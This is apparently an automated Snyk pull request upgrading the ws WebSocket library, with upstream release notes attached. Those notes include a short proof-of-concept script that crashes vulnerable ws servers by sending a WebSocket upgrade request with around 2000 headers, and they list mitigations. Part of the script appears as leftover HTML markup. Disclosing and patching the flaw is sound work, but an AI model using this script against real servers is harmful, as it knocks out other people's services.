[Snyk] Upgrade ws from 8.2.3 to 8.18.0

[rater193]

This PR was automatically created by Snyk using the credentials of a real user.


Snyk has created this PR to upgrade ws from 8.2.3 to 8.18.0.

ℹ️ Keep your dependencies up-to-date. This makes it easier to fix existing vulnerabilities and to more quickly identify and fix newly disclosed vulnerabilities when they affect your project.

---

• The recommended version is 24 versions ahead of your current version.

• The recommended version was released on 22 days ago.

Issues fixed by the recommended upgrade:

	Issue	Score	Exploit Maturity
	Denial of Service (DoS) SNYK-JS-WS-7266574	696	Proof of Concept

Release notes

Package name: ws

• 8.18.0 - 2024-07-03
  

  Features

  • Added support for Blob (#2229).
• 8.17.1 - 2024-06-16
  

  Bug fixes

  • Fixed a DoS vulnerability (#2231).

  A request with a number of headers exceeding theserver.maxHeadersCount
  threshold could be used to crash a ws server.

  const http = require('http');
  const WebSocket = require('ws');

  const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
  if (count === 2000) break;

  <span class="pl-k">for</span> <span class="pl-kos">(</span><span class="pl-k">let</span> <span class="pl-s1">j</span> <span class="pl-c1">=</span> <span class="pl-c1">0</span><span class="pl-kos">;</span> <span class="pl-s1">j</span> <span class="pl-c1">&lt;</span> <span class="pl-s1">chars</span><span class="pl-kos">.</span><span class="pl-c1">length</span><span class="pl-kos">;</span> <span class="pl-s1">j</span><span class="pl-c1">++</span><span class="pl-kos">)</span> <span class="pl-kos">{</span>
    <span class="pl-k">const</span> <span class="pl-s1">key</span> <span class="pl-c1">=</span> <span class="pl-s1">chars</span><span class="pl-kos">[</span><span class="pl-s1">i</span><span class="pl-kos">]</span> <span class="pl-c1">+</span> <span class="pl-s1">chars</span><span class="pl-kos">[</span><span class="pl-s1">j</span><span class="pl-kos">]</span><span class="pl-kos">;</span>
    <span class="pl-s1">headers</span><span class="pl-kos">[</span><span class="pl-s1">key</span><span class="pl-kos">]</span> <span class="pl-c1">=</span> <span class="pl-s">'x'</span><span class="pl-kos">;</span>
  
    <span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-c1">++</span><span class="pl-s1">count</span> <span class="pl-c1">===</span> <span class="pl-c1">2000</span><span class="pl-kos">)</span> <span class="pl-k">break</span><span class="pl-kos">;</span>
  <span class="pl-kos">}</span>
  

  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
  headers: headers,
  host: '127.0.0.1',
  port: wss.address().port
  });

  request.end();
  });

  The vulnerability was reported by Ryan LaPointe in #2230.

  In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the
     --max-http-header-size=size and/or the maxHeaderSize options so
     that no more headers than the server.maxHeadersCount limit can be sent.
  2. Set server.maxHeadersCount to 0 so that no limit is applied.
• 8.17.0 - 2024-04-28
  

  Features

  • The WebSocket constructor now accepts the createConnection option (#2219).

  Other notable changes

  • The default value of the allowSynchronousEvents option has been changed to
    true (#2221).

  This is a breaking change in a patch release. The assumption is that the option
  is not widely used.

• 8.16.0 - 2023-12-26
  

  Features

  • Added the autoPong option (01ba54e).
• 8.15.1 - 2023-12-12
  

  Notable changes

  • The allowMultipleEventsPerMicrotask option has been renamed to
    allowSynchronousEvents (4ed7fe5).

  This is a breaking change in a patch release that could have been avoided with
  an alias, but the renamed option was added only 3 days ago, so hopefully it
  hasn't already been widely used.

• 8.15.0 - 2023-12-09
  

  Features

  • Added the allowMultipleEventsPerMicrotask option (93e3552).
• 8.14.2 - 2023-09-19
  

  Bug fixes

  • Fixed an issue that allowed errors thrown by failed assertions to be
    swallowed when running tests (7f4e1a7).
• 8.14.1 - 2023-09-08
• 8.14.0 - 2023-09-06
• 8.13.0 - 2023-03-10
• 8.12.1 - 2023-02-13
• 8.12.0 - 2023-01-07
• 8.11.0 - 2022-11-06
• 8.10.0 - 2022-10-24
• 8.9.0 - 2022-09-22
• 8.8.1 - 2022-07-15
• 8.8.0 - 2022-06-09
• 8.7.0 - 2022-05-26
• 8.6.0 - 2022-05-01
• 8.5.0 - 2022-02-07
• 8.4.2 - 2022-01-14
• 8.4.1 - 2022-01-13
• 8.4.0 - 2021-12-20
• 8.3.0 - 2021-11-23
• 8.2.3 - 2021-10-02

from ws GitHub release notes

---

Important

• Check the changes in this PR to ensure they won't cause issues with your project.
• This PR was automatically created by Snyk using the credentials of a real user.
• Max score is 1000. Note that the real score may have changed since the PR was raised.

---

Note: You are seeing this because you or someone else with access to this repository has authorized Snyk to open upgrade PRs.

For more information:

• 🧐 View latest project report
• 📜 Customise PR templates
• 🛠 Adjust upgrade PR settings
• 🔕 Ignore this dependency or unsubscribe from future upgrade PRs